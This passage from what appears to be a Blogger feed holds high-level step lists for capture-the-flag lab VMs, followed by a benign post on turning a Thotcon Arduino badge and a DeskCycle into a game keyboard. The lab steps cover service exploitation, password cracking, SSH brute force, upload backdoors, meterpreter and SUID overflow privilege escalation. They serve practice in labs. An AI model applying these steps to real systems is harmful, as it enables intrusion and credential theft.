port 9200 open</div>
<div>
14. Utilize curl and query machine with port 9200 open and find what’s running on it, including any</div>
<div>
version numbers</div>
<div>
15. Exploit the service running on port 9200</div>
<div>
a. Search for an exploit that works against version of service running on 9200</div>
<div>
b. Utilize the exploit and gain shell access</div>
<div>
c. Examine / directory for interesting files</div>
<div>
16. Utilize passwords file collected from machine with port 9200 open, crack the passwords, and</div>
<div>
build a username and password list</div>
<div>
a. https://crackstation.net/</div>
<div>
17. Attack SSH running on the target machine with the username and password list</div>
<div>
18. After logging in successfully on the target machine via SSH, gather machine information</div>
<div>
a. Get OS info</div>
<div>
b. Get kernel info</div>
<div>
c. Arch info (64bit or 32bit)</div>
<div>
19. Use privesc exploit to get root privs</div>
<div>
a. Utilize collected info to search for privesc exploits</div>
<div>
b. Compile the privesc exploits and transfer the compiled files to target system using SCP</div>
<div>
c. Execute the exploits to finally get root privs</div>
</div>
<div>
<br /></div>
<div>
<div>
<b>Socnet2/social network 2:</b></div>
<div>
Goal: Get root privilege on the machine</div>
<div>
1. Start by port scanning and locating socnet2 VM.</div>
<div>
a. Port 22, 80, and 8000 should be open. Mac address should be: 08:00:27:e9:e5:e6</div>
<div>
2. Do an aggressive nmap scan and find more information about the services running</div>
<div>
3. Visit webservers</div>
<div>
4. Visit webserver on port 80 and examine it</div>
<div>
a. Sign up</div>
<div>
b. Explore the site</div>
<div>
c. Look for any issues</div>
<div>
5. Get a backdoor on the webserver</div>
<div>
a. Utilize file upload functionality to get a backdoor on the webserver</div>
<div>
b. Run the backdoor</div>
<div>
6. Utilized the backdoor to find more information about whats running on port 8000</div>
<div>
a. Examine the file system, processes</div>
<div>
b. Be sure to read social network posts as well</div>
<div>
7. Abuse the service running on port 8000 to get another shell</div>
<div>
a. Examine the source code for the service running on port 8000</div>
<div>
b. Write a custom tool/script to gain shell through service running on port 8000</div>
<div>
i. https://docs.python.org/2/library/xmlrpclib.html</div>
<div>
8. Load a meterpreter backdoor on the victim machine and utilize it to examine files in the users</div>
<div>
directory</div>
<div>
9. Write an exploit for SUID binary</div>
<div>
a. Find the SUID binary in the user folder</div>
<div>
b. Binary includes a backdoor function</div>
<div>
i. https://github.com/radareorg/cutter</div>
<div>
c. Download the binary, use a debugger, and different inputs to trigger a crash and control</div>
<div>
the EIP</div>
<div>
d. Create a working exploit that launches backdoor function</div>
<div>
10. Put the exploit on victim machine and exploit the SUID binary to get root</div>
</div>
<div>
<br /></div>
<div>
<div>
Moriarty Corp:</div>
<div>
Goal: Get all the flags</div>
</div>
<div>
<br /></div>
<div>
No guide or hints. Sorry.</div>
<div>
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-88617221226514567852019-04-20T14:14:00.000-07:002019-04-20T14:14:07.743-07:00Using thotcon 0x8 (Arduino Leonardo) badge and Deskcycle to walk/run in video games! <span id="docs-internal-guid-75e53f69-7fff-e754-cd99-f302330ad0f6"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">I bought a DeskCycle (</span><a href="https://deskcycle.com/products/deskcycle-under-desk-bike" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://deskcycle.com/products/deskcycle-under-desk-bike</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) so I can mindlessly cycle at home while working on other tasks. (I’m not 100% sure of the health impact but it doesn’t really matter for now) Of course, it came with a display that let you track your speed, distance, and etc. it also came with a 3.5mm aux audio cable that you can use if you wanted to have the tracker display on your desk. I had the idea of using the Deskcycle to walk or run in games, like Just Cause 3 or any similar game has good visuals. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">First thing I did is to Google to see if anyone had interfaced Arduino with DeskCycle and someone had. Neave Engineering blog (</span><a href="https://neave.engineering/?s=deskcycle" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://neave.engineering/?s=deskcycle</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) has three articles on interfacing DeskCycle with an Arduino. One of the articles (</span><a href="https://neave.engineering/2015/04/03/arduino-speedometer-for-the-deskcycle/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://neave.engineering/2015/04/03/arduino-speedometer-for-the-deskcycle/</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) mentions that there is a switch that closes as cycle revolutions happen, which made my job easier. Basically, the input from 3.5mm jack can be treated like button input. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This is where the Thotcon </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">(</span><a href="https://thotcon.org/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://thotcon.org/</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 0x8 badge comes in. Thotcon 0x8 badge is built on Arduino Leonardo, which can also work as a keyboard! (Teensy would work too but I had a thotcon badge sitting around) A hackaday.io project post had the instructions to reprogram the badge via ICSP header (</span><a href="https://hackaday.io/project/21797-thotcon-0x8-badge/log/59432-badge-hacking-update" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://hackaday.io/project/21797-thotcon-0x8-badge/log/59432-badge-hacking-update</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">). It involves connecting AVR programmer then burning bootloader. After that, the badge can be reprogrammed via USB. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">At this point, I hadn’t read the whole article from Neave Engineering. I spent hours trying to make the badge press and hold ‘w’ key (to walk forward in a game) in a bunch of different ways. For some reason, key presses would stop/weren’t continuous and I had other issues too. I went back and looked at the Neave Engineering post again and decided to reuse that code. Neave Engineering code can be found here: </span><a href="https://github.com/kneave/dcspeedo/blob/master/speedo/speedo.ino" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/kneave/dcspeedo/blob/master/speedo/speedo.ino</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> The code comments are very useful! </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">I cut my 3.5mm cable, found the two wires that connect when a cycle/revolution happens and attached one to ground and one to pin 12 (var name is trigger in the code). As far as I can tell, the bottom row of pins in Thotcon 0x8 badge are all ground pins, although, I might be wrong. I didn’t closely test all of them. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Here’s my badge, with DeskCycle output pins attached to pin 12 and ground:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="573" src="https://lh4.googleusercontent.com/7ohApT7bd5XRqxkl6PbxSAVMB0q0JvjGeUtsVtBt_J5ykaiSSjtakav7Z3AhKwkn1VEljXUutwTSkKUj14CLQs5pOez41raYNtGx_Af-niFIsZASAp7-3l4vPakszABCj7wrtdyN" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="417" /></span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="386" src="https://lh4.googleusercontent.com/lAnQ15wtP7sS0YIo521l5endjaKdAP0-iPwvlN-rEc4IXztCcMakmf1WYGhyEyT4IDPRo08O7U5t4NxtDOTI_BbDBnf5oRDgHaXS7Sdl15Isjn6KXVadWna8idbr5BIZ1-Bk99Gm" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="414" /></span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Here’s my modified code that does a keypress:</span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">#include <Keyboard.h></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float pi = 3.14159265;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float inchesPerMile = 63360;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const int wheelSize = 26;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float gearRatio = 2.75;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float wheelCircumference = wheelSize * pi;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">long lastTriggerTime = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">long currentTriggerTime = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">long triggerInterval = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">int lastTriggerValue = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">int triggerValue = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">int trigger = 12;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">float cadence = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">float currentSpeed = 0;</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">void setup() {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> pinMode(trigger, INPUT); // set pin to input</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> digitalWrite(trigger, HIGH); // turn on pullup resistors</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Keyboard.begin();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> cli();//stop interrupts</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> TCCR1A = 0;// set entire TCCR2A register to 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> TCCR1B = 0;// same for TCCR2B</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> TCNT1 = 0;//initialize counter value to 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> OCR1A = 124;// = (16*10^6) / (2000*64) - 1 (must be <256)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> TCCR1A |= (1 << WGM01);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> TCCR1B |= (1 << CS01) | (1 << CS00);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> TIMSK1 |= (1 << OCIE1A);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> sei();//allow interrupts</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> lastTriggerTime = millis(); </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">}//end setup</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ISR(TIMER1_COMPA_vect) {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> triggerValue = digitalRead(trigger);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> triggerValue = triggerValue == 0 ? 1 : 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> currentTriggerTime = millis();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> triggerInterval = currentTriggerTime - lastTriggerTime;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> if(triggerInterval >= 2000)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> cadence = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> currentSpeed = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> if(lastTriggerValue != triggerValue)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> lastTriggerValue = triggerValue;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> if(triggerValue == 1)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> lastTriggerTime = currentTriggerTime;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> cadence = 60000 / triggerInterval;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> float rph = cadence * 60;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> float wheelRph = rph * gearRatio;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> float inchesPerHour = wheelCircumference * wheelRph;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> currentSpeed = inchesPerHour / inchesPerMile; </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">void loop() {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> //not checking to see if w is pressed already since this code is not causing any issue. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> if (currentSpeed > 0){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Keyboard.press('w');</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> else {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Keyboard.releaseAll();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">I removed serial output stuff since it wasn’t needed. I only care about the speed.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If speed is higher than 0, then keep pressing w, else release all the keys. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If there hasn’t been a cycle/revolution in more than 2 seconds, speed is set to 0.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">What else you can do? You can do if or switch loop based on the speed and add Shift key press (some games allow you to sprint with it), or change LED colors, and so on. (For changing LEDs on thotcon 0x8 badge, this should help: </span><a href="https://gist.github.com/gigawatts/a7e4b440b29895fd15d8c6f00d41852e" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://gist.github.com/gigawatts/a7e4b440b29895fd15d8c6f00d41852e</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> and </span><a href="https://github.com/FastLED/FastLED/wiki/Basic-usage" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/FastLED/FastLED/wiki/Basic-usage</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ) I assume you can also do something with Google Street View as well. </span></div>
<br /></span>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-14812777578333971832018-12-28T12:21:00.000-08:002018-12-28T12:21:01.028-08:00Using pwntools for reverse shell handling and automation<b>Introduction:</b><br />
